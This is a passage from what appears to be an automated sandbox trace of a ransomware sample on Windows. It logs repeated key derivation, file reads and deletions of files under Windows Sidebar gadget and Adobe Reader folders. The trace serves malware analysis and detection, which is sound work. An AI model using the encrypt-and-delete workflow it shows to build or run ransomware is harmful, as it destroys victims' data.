hFile=0x5d4, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0196.812] CryptDestroyHash (hHash=0x284d528) returned 1 [0196.812] CryptDestroyKey (hKey=0x284d568) returned 1 [0196.812] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0196.813] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_gray_cloudy.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_gray_cloudy.png")) returned 0 [0196.853] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0196.853] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0196.853] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0196.853] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0196.853] GetFileSize (in: hFile=0x5dc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x8450 [0196.853] ReadFile (in: hFile=0x5dc, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0196.858] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0196.858] CryptDestroyKey (hKey=0x284d568) returned 1 [0196.858] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0196.859] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_gray_few-showers.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_gray_few-showers.png")) returned 0 [0196.860] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0196.860] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0196.860] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0196.860] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0196.860] GetFileSize (in: hFile=0x5d4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x893d [0196.860] ReadFile (in: hFile=0x5d4, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0196.864] CryptDestroyHash (hHash=0x284d528) returned 1 [0196.864] CryptDestroyKey (hKey=0x284d568) returned 1 [0196.864] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0196.866] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_gray_foggy.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_gray_foggy.png")) returned 0 [0196.866] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0196.867] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0196.867] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0196.867] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0196.867] GetFileSize (in: hFile=0x5dc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x9508 [0196.867] ReadFile (in: hFile=0x5dc, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0196.872] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0196.872] CryptDestroyKey (hKey=0x284d568) returned 1 [0196.872] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0196.873] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_gray_hail.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_gray_hail.png")) returned 0 [0196.873] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0196.874] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0196.874] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0196.874] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0196.874] GetFileSize (in: hFile=0x5d4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa742 [0196.874] ReadFile (in: hFile=0x5d4, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0196.878] CryptDestroyHash (hHash=0x284d528) returned 1 [0196.878] CryptDestroyKey (hKey=0x284d568) returned 1 [0196.879] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0196.880] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_gray_rainy.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_gray_rainy.png")) returned 0 [0196.881] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0196.881] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0196.881] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0196.881] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0196.881] GetFileSize (in: hFile=0x5dc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa0df [0196.881] ReadFile (in: hFile=0x5dc, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0196.891] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0196.891] CryptDestroyKey (hKey=0x284d568) returned 1 [0196.891] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0196.892] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_gray_snow.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_gray_snow.png")) returned 0 [0196.893] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0196.893] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0196.893] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0196.893] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0196.893] GetFileSize (in: hFile=0x5d4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x92d0 [0196.893] ReadFile (in: hFile=0x5d4, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0196.898] CryptDestroyHash (hHash=0x284d528) returned 1 [0196.898] CryptDestroyKey (hKey=0x284d568) returned 1 [0196.898] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0196.900] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_gray_thunderstorm.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_gray_thunderstorm.png")) returned 0 [0196.900] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0196.901] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0196.901] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0196.901] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0196.901] GetFileSize (in: hFile=0x5dc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xed [0196.901] ReadFile (in: hFile=0x5dc, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0196.901] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0196.901] CryptDestroyKey (hKey=0x284d568) returned 1 [0196.901] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0196.903] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\_HELP.txt" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\_help.txt")) returned 1 [0196.904] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0196.904] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0196.904] CryptHashData (hHash=0x284d668, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0196.904] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0196.904] GetFileSize (in: hFile=0x5c0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x172a [0196.904] ReadFile (in: hFile=0x5c0, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0196.916] CryptDestroyHash (hHash=0x284d668) returned 1 [0196.916] CryptDestroyKey (hKey=0x284d528) returned 1 [0196.916] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0196.917] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\logo.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\logo.png")) returned 0 [0196.918] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0196.918] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0196.918] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0196.918] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0196.926] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0196.927] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0196.927] CryptHashData (hHash=0x284d628, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0196.927] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0196.927] GetFileSize (in: hFile=0x588, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4268 [0196.927] ReadFile (in: hFile=0x588, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0196.941] CryptDestroyHash (hHash=0x284d628) returned 1 [0196.941] CryptDestroyKey (hKey=0x284d568) returned 1 [0196.941] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0196.942] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\benioku.htm")) returned 1 [0196.945] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0196.946] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0196.946] CryptHashData (hHash=0x284d528, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0196.946] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0196.946] GetFileSize (in: hFile=0x5d4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x42ba [0196.946] ReadFile (in: hFile=0x5d4, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0196.950] CryptDestroyHash (hHash=0x284d528) returned 1 [0196.950] CryptDestroyKey (hKey=0x284d568) returned 1 [0196.950] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0196.951] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Berime.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\berime.htm")) returned 1 [0196.953] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0196.956] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0196.956] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0196.956] CryptHashData (hHash=0x284d628, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0196.956] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0196.956] GetFileSize (in: hFile=0x588, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4288 [0196.957] ReadFile (in: hFile=0x588, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0197.001] CryptDestroyHash (hHash=0x284d628) returned 1 [0197.001] CryptDestroyKey (hKey=0x284d568) returned 1 [0197.001] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0197.002] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\IrakHau.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\irakhau.htm")) returned 1 [0197.008] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0197.008] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0197.008] CryptHashData (hHash=0x284d528, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0197.008] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0197.008] GetFileSize (in: hFile=0x5d4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x423b [0197.008] ReadFile (in: hFile=0x5d4, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0197.018] CryptDestroyHash (hHash=0x284d528) returned 1 [0197.018] CryptDestroyKey (hKey=0x284d568) returned 1 [0197.018] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0197.020] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leame.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leame.htm")) returned 1 [0197.074] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0197.074] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0197.074] CryptHashData (hHash=0x284d628, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0197.074] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0197.074] GetFileSize (in: hFile=0x588, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x41e3 [0197.074] ReadFile (in: hFile=0x588, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0197.092] CryptDestroyHash (hHash=0x284d628) returned 1 [0197.092] CryptDestroyKey (hKey=0x284d568) returned 1 [0197.092] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0197.094] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeesMij.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leesmij.htm")) returned 1 [0197.096] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0197.097] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0197.097] CryptHashData (hHash=0x284d528, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0197.097] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0197.097] GetFileSize (in: hFile=0x5d4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4289 [0197.097] ReadFile (in: hFile=0x5d4, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0197.107] CryptDestroyHash (hHash=0x284d528) returned 1 [0197.107] CryptDestroyKey (hKey=0x284d568) returned 1 [0197.107] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0197.108] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leggimi.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leggimi.htm")) returned 1 [0197.110] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0197.110] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0197.110] CryptHashData (hHash=0x284d628, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0197.110] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0197.110] GetFileSize (in: hFile=0x588, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4273 [0197.110] ReadFile (in: hFile=0x588, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0197.115] CryptDestroyHash (hHash=0x284d628) returned 1 [0197.115] CryptDestroyKey (hKey=0x284d568) returned 1 [0197.115] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0197.116] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeiaMe.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leiame.htm")) returned 1 [0197.120] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0197.121] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0197.121] CryptHashData (hHash=0x284d528, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0197.121] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0197.121] GetFileSize (in: hFile=0x5d4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x42b6 [0197.121] ReadFile (in: hFile=0x5d4, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0197.139] CryptDestroyHash (hHash=0x284d528) returned 1 [0197.139] CryptDestroyKey (hKey=0x284d568) returned 1 [0197.139] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0197.141] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Liesmich.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\liesmich.htm")) returned 1 [0197.148] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0197.149] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0197.149] CryptHashData (hHash=0x284d628, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0197.149] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0197.149] GetFileSize (in: hFile=0x588, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x43c7 [0197.149] ReadFile (in: hFile=0x588, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0197.208] CryptDestroyHash (hHash=0x284d628) returned 1 [0197.208] CryptDestroyKey (hKey=0x284d568) returned 1 [0197.208] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0197.209] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Lisezmoi.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\lisezmoi.htm")) returned 1 [0197.211] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0197.212] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0197.212] CryptHashData (hHash=0x284d528, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0197.212] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0197.212] GetFileSize (in: hFile=0x5d4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x41fc [0197.212] ReadFile (in: hFile=0x5d4, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0197.215] CryptDestroyHash (hHash=0x284d528) returned 1 [0197.215] CryptDestroyKey (hKey=0x284d568) returned 1 [0197.215] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0197.216] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Llegiu-me.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\llegiu-me.htm")) returned 1 [0197.218] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0197.219] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0197.219] CryptHashData (hHash=0x284d628, 